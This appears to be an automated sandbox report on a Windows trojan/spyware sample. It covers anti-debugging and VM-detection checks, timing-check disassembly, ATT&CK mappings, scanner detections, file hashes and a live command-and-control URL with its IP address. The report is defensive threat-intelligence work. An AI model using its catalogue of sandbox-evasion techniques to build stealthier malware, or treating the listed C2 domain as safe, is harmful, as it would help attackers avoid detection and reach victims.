Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 7300C12 second address: 7300AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC798F413BDh 0x0000000d jne 00007FC728ECBDFDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007FC728ECBDFDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007FC728EDC2FDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007FC728ECBE17h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007FC728ECBE08h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007FC728ECBE0Eh 0x00000051 xchg eax, ebp 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72E0DBB second address: 72E0E1A instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC7292A9B15h 0x0000000d adc ah, FFFFFFD6h 0x00000010 jmp 00007FC7292A9B11h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, si 0x0000001e pushfd 0x0000001f jmp 00007FC7292A9B14h 0x00000024 add cl, 00000028h 0x00000027 jmp 00007FC7292A9B0Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72E0E1A second address: 72E0E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FC728ECBE0Ch 0x00000011 mov ax, C691h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop eax 0x0000001c mov ch, dh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0450 second address: 72F0456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0456 second address: 72F04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC728ECBE0Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 pushfd 0x00000014 jmp 00007FC728ECBE10h 0x00000019 and cx, 64B8h 0x0000001e jmp 00007FC728ECBE0Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04A3 second address: 72F04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04A7 second address: 72F04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F04C2 second address: 72F050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007FC7292A9B0Bh 0x0000000b or cx, FBDEh 0x00000010 jmp 00007FC7292A9B19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 mov ax, 4331h 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F050F second address: 72F0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0515 second address: 72F0547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c call 00007FC7292A9B0Bh 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 mov bx, si 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC7292A9B0Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0547 second address: 72F054D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F054D second address: 72F0566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0566 second address: 72F056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F056C second address: 72F05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FC7292A9B16h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007FC7292A9B10h 0x00000017 sub ecx, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC7292A9B0Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F05B9 second address: 72F05CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F05CB second address: 72F0668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FC7292A9B0Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007FC7292A9B10h 0x00000016 mov eax, 00000001h 0x0000001b pushad 0x0000001c push esi 0x0000001d mov dl, 01h 0x0000001f pop eax 0x00000020 mov di, 12EAh 0x00000024 popad 0x00000025 lock cmpxchg dword ptr [esi], ecx 0x00000029 pushad 0x0000002a pushad 0x0000002b mov dl, 82h 0x0000002d pushfd 0x0000002e jmp 00007FC7292A9B16h 0x00000033 xor ch, FFFFFFD8h 0x00000036 jmp 00007FC7292A9B0Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov cx, 398Fh 0x00000041 popad 0x00000042 mov ecx, eax 0x00000044 pushad 0x00000045 mov ah, CBh 0x00000047 mov bx, 0E20h 0x0000004b popad 0x0000004c cmp ecx, 01h 0x0000004f pushad 0x00000050 mov di, 8138h 0x00000054 call 00007FC7292A9B11h 0x00000059 mov bh, cl 0x0000005b pop edx 0x0000005c popad 0x0000005d jne 00007FC79930BA77h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop edi 0x00000068 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0668 second address: 72F06AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC728ECBE12h 0x0000000f and si, 25F8h 0x00000014 jmp 00007FC728ECBE0Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, cx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F06AA second address: 72F06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F06AF second address: 72F071F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC728ECBE19h 0x00000009 xor eax, 07476546h 0x0000000f jmp 00007FC728ECBE11h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC728ECBE10h 0x0000001b adc eax, 499A11E8h 0x00000021 jmp 00007FC728ECBE0Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC728ECBE10h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F071F second address: 72F0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0723 second address: 72F0729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0729 second address: 72F072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F072F second address: 72F0733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0733 second address: 72F0749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7292A9B0Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 72F0749 second address: 72F074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Special instruction interceptor: First address: F819DD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Special instruction interceptor: First address: F81AC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Special instruction interceptor: First address: 112B711 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Special instruction interceptor: First address: F7F606 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Special instruction interceptor: First address: 11BD5C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Code function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Code function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: qZA8AyGxiA.exe, 00000000.00000003.2275525344.00000000019D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: qZA8AyGxiA.exe, 00000000.00000003.2384457844.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383814579.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2406532022.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383592032.0000000001A46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&}[P
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: qZA8AyGxiA.exe Binary or memory string: Hyper-V RAW
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: qZA8AyGxiA.exe, 00000000.00000003.2277579275.0000000006B31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe File opened: NTICE
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe File opened: SICE
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe File opened: SIWVID
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Code function: 0_2_008A1160 SetUnhandledExceptionFilter,0_2_008A1160
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Code function: 0_2_008A11A3 SetUnhandledExceptionFilter,0_2_008A11A3
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Code function: 0_2_008A13C9 SetUnhandledExceptionFilter,0_2_008A13C9
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: oBProgram Manager
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\qZA8AyGxiA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.6:49736 -> 5.101.3.217:80
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| qZA8AyGxiA.exe | 53% | ReversingLabs | Win32.Trojan.Generic | |
| qZA8AyGxiA.exe | 53% | Virustotal | | Browse |
| qZA8AyGxiA.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| qZA8AyGxiA.exe | 100% | Joe Sandbox ML | | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3 | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe | |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high |
| home.fiveth5ht.top | 5.101.3.217 | true | false | | high |
| httpbin.org | 3.218.7.103 | true | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown |
| https://httpbin.org/ip | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://curl.se/docs/hsts.html | qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
| http://html4/loose.dtd | qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://httpbin.org/ipbefore | qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html | qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| https://curl.se/docs/hsts.html# | qZA8AyGxiA.exe | false | | high |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3 | qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown |
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://curl.se/docs/alt-svc.htmlqZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                      high
                      http://.cssqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                        high
                        http://.jpgqZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpfalse
                          high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation | | 34665 | PINDC-ASRU | false
3.218.7.103 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581233
Start date and time: 2024-12-27 08:54:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: qZA8AyGxiA.exe
renamed because original name is a hash value
Original Sample Name: 75f83958dc211ddd4dfed631aed3aafa.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                      No context
                                      No context
                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.984453851604812
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: qZA8AyGxiA.exe
File size: 4'508'672 bytes
MD5: 75f83958dc211ddd4dfed631aed3aafa
SHA1: b47b4351e5be4bc3830ca73454ee8be8f4f32beb
SHA256: 85b5d57cad412bcc5921e20d965120f850769b547fc9e63c2a0f1a18f12f7867
SHA512: ee8f783396c0419f6af4f3148ae91c994c084998ad499ace665c40053661cdb7b0d3f5d7c5d04ee18c4e84889b2944ae1dfc637a9d19f4271634a02c18b4b084
SSDEEP: 49152:F3IsqIWhmytT6yGQJLB3p85cVUaRp2HeauaziONsTybSgbBRV/uiGisa0ZZM48YS:Ffqb9eyJlr7V/qXiTyW04zAvyWJV0Z
TLSH: 0C2633D78D779245CF9C8F3A11224F03A96409F3DB7B08202A4EF70ECD25BE518966E9
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................<9E...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x103d000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
